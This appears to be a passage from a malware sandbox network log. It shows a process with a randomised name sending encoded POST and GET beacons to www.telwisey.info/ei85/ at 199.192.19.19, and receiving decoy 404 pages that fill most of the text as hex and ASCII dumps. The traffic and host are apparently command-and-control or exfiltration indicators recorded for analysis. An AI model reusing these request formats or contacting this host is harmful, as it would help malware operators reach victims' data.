4a 78 39 43 45 79 56 30 5a 56 73 37 50 70 70 61 54 4b 77 45 63 35 4d 6b 43 70 4f 4a 41 7a 75 67 68 54 6e 6a 31 38 74 4d 67 30 71 59 68 31 31 70 78 4f 4d 4f 61 35 70 7a 32 36 50 66 4d 52 47 6c 59 42 57 4f 4b 4b 64 33 52 6e 51 66 76 6a 35 4d 43 76 57 6e 41 5a 6c 75 6f 30 35 76 68 57 4c 35 72 55 69 69 74 50 5a 67 6b 77 6b 77 35 41 4d 31 75 53 66 68 35 52 6a 45 2f 55 75 4f 77 45 49 6f 43 69 45 2f 58 49 55 38 55 44 58 44 43 75 51 39 6a 6d 55 4d 46 70 44 51 41 6c 54 64 4c 35 36 Data Ascii: jN=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdcJ0uz/7RUyeXVFAUiDYJx9CEyV0ZVs7PppaTKwEc5MkCpOJAzughTnj18tMg0qYh11pxOMOa5pz26PfMRGlYBWOKKd3RnQfvj5MCvWnAZluo05vhWL5rUiitPZgkwkw5AM1uSfh5RjE/UuOwEIoCiE/XIU8UDXDCuQ9jmUMFpDQAlTdL56
Aug 13, 2024 06:44:48.742109060 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:44:48 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 13, 2024 06:44:48.742151976 CEST	1236	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.488L380.857,346.
Aug 13, 2024 06:44:48.742167950 CEST	1236	IN	Data Raw: 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d Data Ascii: <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.19,93.922-3.149
Aug 13, 2024 06:44:48.742405891 CEST	1236	IN	Data Raw: 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" strok
Aug 13, 2024 06:44:48.742422104 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d Data Ascii: </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="489.555" y1="299.765" x2="489.555" y2="308.124" />
Aug 13, 2024 06:44:48.742438078 CEST	1236	IN	Data Raw: 37 31 39 22 20 78 32 3d 22 32 34 30 2e 31 31 33 22 20 79 32 3d 22 35 35 31 2e 37 31 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 3e 0a 0a 20 20 20 20 20 20 Data Ascii: 719" x2="240.113" y2="551.719" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="186.359" y1="406.967" x2="1
Aug 13, 2024 06:44:48.742455006 CEST	1236	IN	Data Raw: 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 78 3d 22 34 35 30 2e 30 36 36 22 20 63 79 3d 22 33 32 30 2e 32 35 39 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: rlimit="10" cx="450.066" cy="320.259" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="168.303" cy="353.753" r="7.952" />
Aug 13, 2024 06:44:48.742748976 CEST	108	IN	Data Raw: 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 32 35 33 2e 32 39 22 20 63 79 3d 22 32 32 39 2e 32 34 22 20 72 3d 22 32 2e 36 35 31 22 20 Data Ascii: .651" /> <circle fill="#0E0620" cx="253.29" cy="229.24" r="2.651" /> <circle
Aug 13, 2024 06:44:48.742801905 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 13, 2024 06:44:48.742818117 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=
Aug 13, 2024 06:44:48.747374058 CEST	1236	IN	Data Raw: 38 31 37 2d 35 2e 38 31 38 2d 32 2e 34 38 34 2d 39 2e 30 34 36 0a 09 09 09 09 43 33 37 35 2e 36 32 35 2c 34 33 37 2e 33 35 35 2c 33 38 33 2e 30 38 37 2c 34 33 37 2e 39 37 33 2c 33 38 38 2e 37 36 32 2c 34 33 34 2e 36 37 37 7a 22 20 2f 3e 0a 20 20 Data Ascii: 817-5.818-2.484-9.046C375.625,437.355,383.087,437.973,388.762,434.677z" /> </g> <g id="armL"> <path fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="roun

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.5	49735	199.192.19.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:50.691066980 CEST	1810	OUT	POST /ei85/ HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Accept-Encoding: gzip, deflate, br Host: www.telwisey.info Origin: http://www.telwisey.info Cache-Control: max-age=0 Connection: close Content-Type: application/x-www-form-urlencoded Content-Length: 1239 Referer: http://www.telwisey.info/ei85/ User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36 Data Raw: 6a 4e 3d 44 54 4f 4b 63 69 51 79 6d 76 35 42 59 35 66 4e 68 49 4d 64 4d 73 2b 56 61 77 38 54 57 72 72 42 6e 68 36 64 61 4e 5a 67 72 64 55 4a 30 37 76 2f 37 79 73 79 66 58 56 46 49 30 69 47 59 4a 78 61 43 45 71 52 30 5a 4a 53 37 4e 68 70 61 78 53 77 46 74 35 4d 74 43 70 4f 55 51 7a 6a 76 42 53 6a 6a 31 73 70 4d 6b 51 71 59 68 31 31 70 32 2b 4d 49 4f 6c 70 78 32 36 4d 49 38 52 4b 68 59 42 2b 4f 4b 53 4e 33 52 6a 71 66 2b 44 35 4d 69 2f 57 6c 32 46 6c 6e 6f 30 37 75 68 57 6c 35 72 52 79 69 74 54 37 67 6e 74 78 77 36 51 4d 6a 49 44 30 37 70 52 72 62 4d 30 2b 49 6a 59 2f 2f 33 53 62 38 47 4d 6e 78 6a 6a 55 4c 69 6e 39 77 6c 57 6f 4a 68 35 4e 54 45 68 44 50 38 67 32 78 79 59 7a 76 74 67 58 74 6f 6e 34 71 6a 68 44 75 4c 6a 4d 5a 52 78 55 5a 61 46 61 74 61 47 4d 41 32 35 49 52 72 70 72 64 46 4d 68 43 62 31 73 43 4c 36 6e 54 4c 43 5a 33 75 72 69 70 63 71 38 4e 75 32 54 45 6a 2b 43 37 61 4c 39 35 58 73 4a 30 38 77 48 73 49 77 51 51 32 31 7a 76 2b 79 75 47 47 57 64 33 44 6b 68 51 4a 65 45 2f 6f 34 73 77 6a 37 [TRUNCATED] Data Ascii: jN=DTOKciQymv5BY5fNhIMdMs+Vaw8TWrrBnh6daNZgrdUJ07v/7ysyfXVFI0iGYJxaCEqR0ZJS7NhpaxSwFt5MtCpOUQzjvBSjj1spMkQqYh11p2+MIOlpx26MI8RKhYB+OKSN3Rjqf+D5Mi/Wl2Flno07uhWl5rRyitT7gntxw6QMjID07pRrbM0+IjY//3Sb8GMnxjjULin9wlWoJh5NTEhDP8g2xyYzvtgXton4qjhDuLjMZRxUZaFataGMA25IRrprdFMhCb1sCL6nTLCZ3uripcq8Nu2TEj+C7aL95XsJ08wHsIwQQ21zv+yuGGWd3DkhQJeE/o4swj7QO4QELvu/Lh9v9NVtL2WAc7iye1TFFKZpXK1JoHkpENODrCCUgYFDn5a+RZV6OyL2/CM9UwEMw+z49V8yY9WYc5wyAZpBKQQ9EB690r6DXvnGM14a5JnXFh+g9sR4mYCtlraRZ/qTWiFNxEvLEbAKX4uZfckJQ2xgzHKOhVpL1vsQWZvJUyGhF8YJJ/ESBkllYC7Sj9nQAp3u7tgrPv3mmwJNELDS5SSiiFXeGabwLmZWkG/YLOj2kAm8r/gJsDBqW9MHkuhGpUFB+Pdad9m/KqGRUNEHTer2Rhp1jCXMj0m5qLVi/0sF0NhJtPqGo5ekSZJ7dS9FuWj1vQ517VBlFDOcNNGrdzwh1/aOIh+Ct3V6GD+3nn6c/ckgm8PybPn9ts/xm4bt1jjNhqw9lmi6x6mynN91u+vWQsdpg2q6azKHaUnaYujtSnZRTt6FkLKRFK8rIexVMHfqQ6nOiWqwrvvEanAT1TLLUJP6F1nqCpn3ni2mMtbeVdpparmdFYWxqB3g+A874S1DOVmZgiOu8ANKmImEf14kESYv+IiWCarURtngYAdgLBsiw+tiQwYFWpWWfUsX2/FZqfOZnIUIXnponW85abUmXACpzDE9YJoBOBmL85MykkMsK5A06Cjt9NfLCFlinJgCmUe5jXdFAwDttaMspIMRL [TRUNCATED]
Aug 13, 2024 06:44:51.389873981 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:44:51 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 13, 2024 06:44:51.389914989 CEST	224	IN	Data Raw: 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 2e 34 35 33 2d 32 37 2e 37 39 38 63 30 2e 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705
Aug 13, 2024 06:44:51.389969110 CEST	1236	IN	Data Raw: 2c 37 2e 34 38 38 4c 33 38 30 2e 38 35 37 2c 33 34 36 2e 31 36 34 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 63 6c 69 70 50 61 74 68 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 6c 69 70 50 61 74 68 20 69 64 3d 22 Data Ascii: ,7.488L380.857,346.164z" /> </clipPath> <clipPath id="cordClip"> <rect width="800" height="600" /> </clipPath> </defs> <g id="planet"> <circle fil
Aug 13, 2024 06:44:51.390023947 CEST	1236	IN	Data Raw: 38 2d 31 2e 31 39 2c 39 33 2e 39 32 32 2d 33 2e 31 34 39 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 73 74 61 72 73 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 Data Ascii: 8-1.19,93.922-3.149" /> </g> <g id="stars"> <g id="starsBig"> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10"
Aug 13, 2024 06:44:51.390058041 CEST	1236	IN	Data Raw: 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 22 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 78 31 3d 22 33 31 30 2e 31 39 34 22 20 79 31 3d 22 31 34 33 2e 33 34 39 22 Data Ascii: necap="round" stroke-miterlimit="10" x1="310.194" y1="143.349" x2="330.075" y2="143.349" /> </g> <g> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="rou
Aug 13, 2024 06:44:51.390142918 CEST	672	IN	Data Raw: 34 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b Data Ascii: 4" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="485.636" y1="303.945" x2="493.473" y2="303.945" /> </g> <g>
Aug 13, 2024 06:44:51.390176058 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 3c 6c 69 6e 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e Data Ascii: <line fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="244.032" y1="547.539" x2="244.032" y2="555.898" /> <line fill="none" stroke="#0E0620" stroke
Aug 13, 2024 06:44:51.390209913 CEST	1236	IN	Data Raw: 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 67 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 63 69 72 63 6c 65 73 42 69 67 22 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 Data Ascii: </g> </g> <g id="circlesBig"> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="588.977" cy="255.978" r="7.952" />
Aug 13, 2024 06:44:51.390243053 CEST	448	IN	Data Raw: 20 20 20 63 78 3d 22 32 38 33 2e 35 32 31 22 20 63 79 3d 22 35 36 38 2e 30 33 33 22 20 72 3d 22 37 2e 39 35 32 22 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 Data Ascii: cx="283.521" cy="568.033" r="7.952" /> <circle fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" cx="413.618" cy="482.387" r="7.952" /> </g>
Aug 13, 2024 06:44:51.390383959 CEST	1236	IN	Data Raw: 20 66 69 6c 6c 3d 22 23 30 45 30 36 32 30 22 20 63 78 3d 22 34 33 34 2e 38 32 34 22 20 63 79 3d 22 32 36 33 2e 39 33 31 22 20 72 3d 22 32 2e 36 35 31 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 63 69 72 63 6c 65 20 66 69 6c Data Ascii: fill="#0E0620" cx="434.824" cy="263.931" r="2.651" /> <circle fill="#0E0620" cx="183.708" cy="544.176" r="2.651" /> <circle fill="#0E0620" cx="382.515" cy="530.923" r="2.651" /> <circle fill="#0
Aug 13, 2024 06:44:51.395241976 CEST	1236	IN	Data Raw: 0a 09 09 09 43 33 36 30 2e 36 34 37 2c 34 35 31 2e 30 38 33 2c 33 34 39 2e 32 35 31 2c 34 35 37 2e 36 36 31 2c 33 33 38 2e 31 36 34 2c 34 35 34 2e 36 38 39 7a 22 20 2f 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 67 20 69 64 3d 22 61 6e 74 Data Ascii: C360.647,451.083,349.251,457.661,338.164,454.689z" /> <g id="antenna"> <line fill="#FFFFFF" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-linejoin="round" stroke-miterlimit=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49736	199.192.19.19	80	1520	C:\Program Files (x86)\IVHMXGZYfsKRjINchuIyVtmBZnEFEqvMjEcfmCFMzi\RxbWnCRczoMimJmDFzH.exe

Timestamp	Bytes transferred	Direction	Data
Aug 13, 2024 06:44:53.257211924 CEST	512	OUT	GET /ei85/?jN=ORmqfURBt40sHMHN3K9lcqnOZkw5OMnI9iieY9Aomdlbsbne+w1Kch9DF1irZ5FVSFO0rJB3/OJZWwrRbdUXhR90PBHPgFvMy30KUVoXMjhVhw+zOJlVxwLOJt1WoLc5Mw==&uXTT=8FDHY8dP HTTP/1.1 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Language: en-us Host: www.telwisey.info Connection: close User-Agent: Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36
Aug 13, 2024 06:44:53.856725931 CEST	1236	IN	HTTP/1.1 404 Not Found Date: Tue, 13 Aug 2024 04:44:53 GMT Server: Apache Content-Length: 16026 Connection: close Content-Type: text/html; charset=utf-8 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 2f 6e 6f 72 6d 61 6c 69 7a 65 2f 35 2e 30 2e 30 2f 6e 6f 72 6d 61 6c 69 7a 65 2e 6d 69 6e 2e 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 63 64 6e 6a 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 61 6a 61 78 2f 6c 69 62 73 [TRUNCATED] Data Ascii: <!DOCTYPE html><html lang="en" ><head> <meta charset="UTF-8"> <title>404 Not Found</title> <meta name="viewport" content="width=device-width, initial-scale=1"><link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/normalize/5.0.0/normalize.min.css"><link rel='stylesheet' href='https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.1.3/css/bootstrap.min.css'><link rel="stylesheet" href="/style.css"></head><body>... partial:index.partial.html --><div class="hamburger-menu"> <button class="burger" data-state="closed"> <span></span> <span></span> <span></span> </button></div><main> <div class="container"> <div class="row"> <div class="col-md-6 align-self-center"> <svg version="1.1" xmlns="http://www.w3.org/2000/svg" xmlns:xlink="http://www.w3.org/1999/xlink" viewBox="0 0 800 600"> <g> <defs> <clipPath id="GlassClip"> <path d="M380.857,346.164c-1.247,4.6 [TRUNCATED]
Aug 13, 2024 06:44:53.856784105 CEST	1236	IN	Data Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 73 2d 32 38 2e 34 38 35 2d 31 36 2e 35 39 39 2d 33 34 2e 38 37 37 2d 32 34 2e 31 39 32 63 2d 33 2e 31 30 31 2d 33 2e 36 38 34 2d 34 2e 31 37 37 2d 38 2e 36 36 2d 32 2e 39 33 2d 31 33 2e 33 31 31 6c 37 Data Ascii: s-28.485-16.599-34.877-24.192c-3.101-3.684-4.177-8.66-2.93-13.311l7.453-27.798c0.756-2.82,3.181-4.868,6.088-5.13 c6.755-0.61,20.546-0.608,41.785,5.087s33.181,12.591,38.725,16.498c2.387,1.682,3.461,4.668,2.705,7.4
Aug 13, 2024 06:44:53.856821060 CEST	1236	IN	Data Raw: 20 2f 3e 0a 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 70 61 74 68 20 69 64 3d 22 72 69 6e 67 53 68 61 64 6f 77 22 20 6f 70 61 63 69 74 79 3d 22 30 2e 35 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 Data Ascii: /> <path id="ringShadow" opacity="0.5" fill="none" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" d="M483.985,127.43c23.462,1.531,52.515,2.436,83.972,2.436c36.069,0,68.978-1.
Aug 13, 2024 06:44:53.856856108 CEST	672	IN	Data Raw: 6e 65 22 20 73 74 72 6f 6b 65 3d 22 23 30 45 30 36 32 30 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 33 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6d 69 74 65 72 6c 69 6d 69 74 3d 22 31 30 Data Ascii: ne" stroke="#0E0620" stroke-width="3" stroke-linecap="round" stroke-miterlimit="10" x1="320.135" y1="132.746" x2="320.135" y2="153.952" /> <line fill="none" stroke="#0E0620" stroke-width="3" stroke-lineca
